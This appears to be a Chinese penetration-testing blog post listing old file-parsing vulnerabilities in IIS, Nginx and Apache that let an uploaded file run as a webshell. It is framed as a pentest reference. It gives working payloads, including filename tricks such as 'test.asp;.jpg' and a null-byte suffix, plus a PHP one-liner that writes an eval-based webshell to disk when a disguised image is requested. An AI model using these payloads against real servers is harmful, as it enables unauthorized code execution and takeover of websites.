渗透测试之解析漏洞

    现在对上传的文件校验越来越严格了,所以导致webshell难以上传,而后面解析漏洞的出现在配合文件上传,可以成功上传webshell。危害程度很高

    现在整理一些网上公布的解析漏洞。不过都是很老的版本,所以前期信息收集很重要,要是遇到这些版本就可以用上了。

    1.IIS5.X-IIS6.0版本

    1.1 目录包含.asp或者.asa时,目录下任何扩展名的文件都会当做asp执行

    例如  目录下c:/test.asp/test.jpg

    那么test.jpg也会被当做asp文件执行。


    1.2 分号截断

    分号后面的不被解析,例如 test.asp;.jpg  这个文件上传后,当做test.asp执行

    

    2.IIS7.0|IIS7.5|Nginx<8.03畸形解析漏洞

    在开启Fast-CGI时上传内容为

    <?php fputs(fopen('webshell.php','w'),'<?php eval($_POST[c]) ?>'); ?>

   文件名为test.jpg,访问test.jpg/.php会生成一句话webshell.php


    3.Nginx<8.03 空字节代码执行

    访问时test.jpg%00.php 会把这个文件当做PHP执行


    4.apache解析漏洞

    apache解析由右向左执行,但是有个问题,apache不认识的后缀不解析,一直到认识的后缀

    例如:test.php.dsdsd.dfsdsd

    会当做test.php执行

    我本地测试了一下发现这个漏洞只有低版本的Apache才有效

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值